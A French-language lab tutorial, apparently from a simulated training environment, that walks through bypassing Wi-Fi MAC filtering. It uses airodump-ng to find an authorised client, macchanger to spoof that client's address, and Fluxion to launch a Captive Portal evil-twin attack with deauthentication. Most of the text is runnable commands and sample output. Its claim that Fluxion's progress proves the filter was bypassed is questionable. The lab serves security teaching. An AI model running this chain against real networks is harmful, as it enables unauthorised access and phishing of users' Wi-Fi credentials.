Introduction
Le filtrage d'adresses MAC (Media Access Control) est une mesure de sécurité réseau où un routeur ou un point d'accès (AP) est configuré pour accepter le trafic uniquement des appareils possédant des adresses MAC spécifiques et pré-approuvées. Bien qu'il puisse dissuader les intrus occasionnels, cette couche de sécurité peut être contournée par une technique appelée "MAC spoofing" (usurpation d'adresse MAC).
Dans ce laboratoire, vous apprendrez le processus complet de contournement du filtrage d'adresses MAC. Vous identifierez d'abord un réseau cible, trouverez l'adresse MAC d'un client déjà autorisé, puis modifierez l'adresse MAC de votre propre adaptateur sans fil pour usurper l'identité de ce client. Enfin, vous verrez comment cela permet à un outil comme Fluxion de lancer avec succès une attaque qui serait autrement bloquée. Ce laboratoire est à des fins éducatives pour vous aider à comprendre les vulnérabilités réseau.
Identification d'un réseau potentiellement utilisant le filtrage MAC
Dans cette étape, vous installerez les outils nécessaires et scannerez les réseaux sans fil à proximité. La première partie de toute évaluation sans fil est la reconnaissance. Nous devons voir quels réseaux sont disponibles et choisir une cible.
Tout d'abord, mettons à jour la liste des paquets et installons la suite aircrack-ng, qui contient les outils dont nous avons besoin pour le scan.
sudo apt-get update
sudo apt-get install -y aircrack-ng
Ensuite, vous devez mettre votre adaptateur sans fil en "mode moniteur" (monitor mode). Ce mode permet à l'adaptateur de capturer tout le trafic Wi-Fi dans l'air, pas seulement le trafic qui lui est adressé. Dans cet environnement simulé, votre adaptateur sans fil est nommé wlan0.
Exécutez la commande suivante pour démarrer le mode moniteur :
sudo airmon-ng start wlan0
Vous devriez voir une sortie indiquant que le mode moniteur a été activé. La commande créera également une nouvelle interface virtuelle, généralement nommée wlan0mon.
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless
(monitor mode enabled on wlan0mon)
Maintenant, utilisez airodump-ng avec la nouvelle interface moniteur (wlan0mon) pour scanner tous les réseaux sans fil à portée.
sudo airodump-ng wlan0mon
Laissez le scan s'exécuter pendant une minute. Vous verrez une liste des points d'accès détectés. Pour ce laboratoire, nous supposerons que notre réseau cible a l'ESSID (nom du réseau) "Target-Net". Appuyez sur Ctrl+C pour arrêter le scan une fois que vous l'avez vu.
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -30 10 0 0 6 54e WPA2 CCMP PSK Target-Net
F8:E4:3B:9A:1B:C0 -65 8 0 0 1 54e WPA2 CCMP PSK Other-Net
À partir de cette sortie, notez le BSSID (00:11:22:33:44:55) et le CH (canal 6) de notre "Target-Net". Nous aurons besoin de ces informations à l'étape suivante.
Utiliser 'airodump-ng' pour trouver l'adresse MAC d'un client connecté
Dans cette étape, vous allez concentrer votre scan sur le réseau cible pour identifier les clients déjà connectés. Pour contourner le filtrage MAC, vous devez usurper l'identité d'un appareil déjà présent sur la "liste blanche" (allow list). Trouver l'adresse MAC d'un client connecté est la clé pour cela.
En utilisant le BSSID et le channel identifiés à l'étape précédente, exécutez à nouveau airodump-ng. Cette fois, vous ajouterez des options pour filtrer le scan afin de n'afficher que les informations concernant notre réseau cible. Cela rend la sortie plus claire et vous aide à trouver les clients plus facilement.
Remplacez 00:11:22:33:44:55 par le BSSID de votre réseau cible et 6 par son canal.
sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon
La sortie sera divisée en deux parties. La partie supérieure affiche des informations sur le point d'accès (AP), et la partie inférieure affiche les clients connectés (stations).
CH 6 ][ Elapsed: 25 s ][ 2023-10-27 10:32
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:11:22:33:44:55 -32 100 30 20 1 6 54e WPA2 CCMP PSK Target-Net
BSSID STATION PWR Rate Lost Frames Probe
00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -40 1- 0 0 15
Regardez la section inférieure sous STATION. C'est l'adresse MAC d'un client connecté au point d'accès "Target-Net". Dans cet exemple, l'adresse MAC du client est AA:BB:CC:DD:EE:FF.
Copiez cette adresse MAC STATION. Vous l'utiliserez à l'étape suivante pour usurper votre propre adresse MAC. Une fois que vous avez l'adresse, vous pouvez arrêter le scan en appuyant sur Ctrl+C.
Utiliser 'macchanger' pour usurper l'adresse MAC de votre adaptateur avec celle du client
Dans cette étape, vous allez modifier l'adresse MAC de votre adaptateur sans fil pour celle que vous avez capturée auprès du client légitime. Ce processus est appelé usurpation d'adresse MAC (MAC spoofing).
Tout d'abord, vous devez installer macchanger, un utilitaire simple pour visualiser et manipuler les adresses MAC.
sudo apt-get install -y macchanger
Avant de modifier l'adresse MAC, vous devez arrêter l'interface en mode moniteur et désactiver l'interface sans fil physique.
sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down
Maintenant, utilisez macchanger pour définir la nouvelle adresse MAC. Utilisez l'option -m suivie de l'adresse MAC du client que vous avez notée à l'étape précédente (AA:BB:CC:DD:EE:FF).
sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0
La sortie vous montrera l'adresse MAC d'origine (Permanent) et confirmera la nouvelle adresse MAC usurpée.
Current MAC: 00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC: AA:BB:CC:DD:EE:FF (unknown)
Enfin, réactivez l'interface sans fil pour que les modifications prennent effet.
sudo ifconfig wlan0 up
Vous pouvez vérifier que l'adresse MAC a été modifiée en exécutant ifconfig wlan0 et en vérifiant le champ ether. Votre adaptateur usurpe maintenant l'identité du client légitime.
Lancer l'attaque Fluxion avec l'adresse MAC usurpée
Dans cette étape, vous allez lancer un outil d'attaque appelé Fluxion. L'objectif est de démontrer qu'avec votre adresse MAC usurpée, l'outil peut s'associer avec succès au point d'accès cible, une étape qui échouerait si le réseau utilisait le filtrage MAC et que vous aviez une adresse MAC aléatoire et non autorisée.
Tout d'abord, vous devez télécharger Fluxion depuis son dépôt GitHub officiel.
git clone https://www.github.com/FluxionNetwork/fluxion.git
Naviguez dans le répertoire fluxion nouvellement créé.
cd fluxion
Maintenant, lancez le script Fluxion avec les privilèges sudo.
sudo ./fluxion.sh
Fluxion est un script interactif. Il vous sera demandé de faire plusieurs sélections. Suivez ces instructions :
- Sélection de la langue : Appuyez sur
Entréepour sélectionner l'anglais (ou tapez le numéro correspondant). - Sélection de l'adaptateur sans fil : Fluxion détectera votre adaptateur
wlan0. Sélectionnez-le en tapant son numéro et en appuyant surEntrée. - Sélection du canal : Choisissez l'option pour scanner les réseaux (par exemple, "All channels scanner").
- Sélection de la cible : Après le scan, une liste de réseaux apparaîtra. Trouvez "Target-Net" et tapez son numéro, puis appuyez sur
Entrée. - Sélection de l'attaque : Choisissez une attaque. Pour cette démonstration, sélectionnez l'attaque
Captive Portal. - Vérification du handshake : Fluxion vérifiera l'existence d'un fichier handshake valide. Choisissez l'option pour ignorer ou effectuer une attaque de désauthentification pour en capturer un.
La partie cruciale de cette étape est d'observer que Fluxion peut progresser à travers ces étapes initiales. Comme votre adresse MAC est maintenant sur la "liste blanche" du point d'accès, les tentatives de Fluxion pour communiquer et s'associer au point d'accès réussiront.
Vérifier que l'attaque progresse au-delà de l'étape d'association
Dans cette dernière étape, vous observerez la sortie de Fluxion pour confirmer que l'usurpation de l'adresse MAC a réussi. Vous n'avez pas besoin de terminer l'attaque complète ; l'objectif est simplement de vérifier que vous avez contourné la vérification de sécurité initiale.
Après avoir sélectionné l'attaque Captive Portal dans Fluxion, l'outil commencera son processus. Vous devriez voir des messages dans le terminal indiquant qu'il est en train de :
- Créer un faux point d'accès (AP).
- Tenter de désauthentifier les clients du vrai AP.
- Attendre qu'un client se connecte au faux AP.
L'observation clé ici est l'absence d'une erreur "association échouée". Si vous aviez essayé de lancer cette attaque sans usurper votre adresse MAC, Fluxion échouerait probablement dès le début car le point d'accès cible rejetterait toute tentative de connexion de votre adresse MAC non autorisée. Le fait que l'attaque progresse jusqu'à l'étape de configuration d'un faux AP et de désauthentification des clients est la preuve que vous avez réussi à contourner le filtre MAC.
Une fois que vous avez vu ces messages et confirmé que l'attaque progresse, vous pouvez arrêter le script en toute sécurité en appuyant sur Ctrl+C dans le terminal.
Comme dernière bonne pratique, vous devriez toujours restaurer l'adresse MAC d'origine de votre adaptateur une fois que vous avez terminé.
Tout d'abord, désactivez l'interface :
sudo ifconfig wlan0 down
Utilisez macchanger avec l'option -p (permanent) pour restaurer l'adresse MAC matérielle d'origine.
sudo macchanger -p wlan0
Enfin, réactivez l'interface.
sudo ifconfig wlan0 up
Vous avez maintenant démontré avec succès comment contourner le filtrage MAC et avez nettoyé en restaurant votre configuration d'origine.
Résumé
Dans ce laboratoire, vous avez appris et exécuté avec succès la technique de contournement du filtrage d'adresses MAC sur un réseau Wi-Fi.
Vous avez commencé par utiliser la suite aircrack-ng pour scanner les réseaux et identifier une cible. Vous vous êtes ensuite concentré sur cette cible avec airodump-ng pour trouver l'adresse MAC d'un client déjà autorisé. En utilisant macchanger, vous avez usurpé l'adresse MAC de votre adaptateur sans fil pour vous faire passer pour ce client. Enfin, vous avez lancé l'outil Fluxion et vérifié que l'attaque pouvait progresser au-delà de l'étape d'association initiale, prouvant ainsi que la mesure de sécurité de filtrage MAC avait été efficacement contournée.
Cette expérience pratique démontre une vulnérabilité courante dans la sécurité réseau et souligne l'importance d'utiliser des mesures de sécurité plus robustes, telles que WPA2/WPA3 avec un mot de passe fort, au lieu de se fier à des identifiants facilement usurpables comme les adresses MAC.
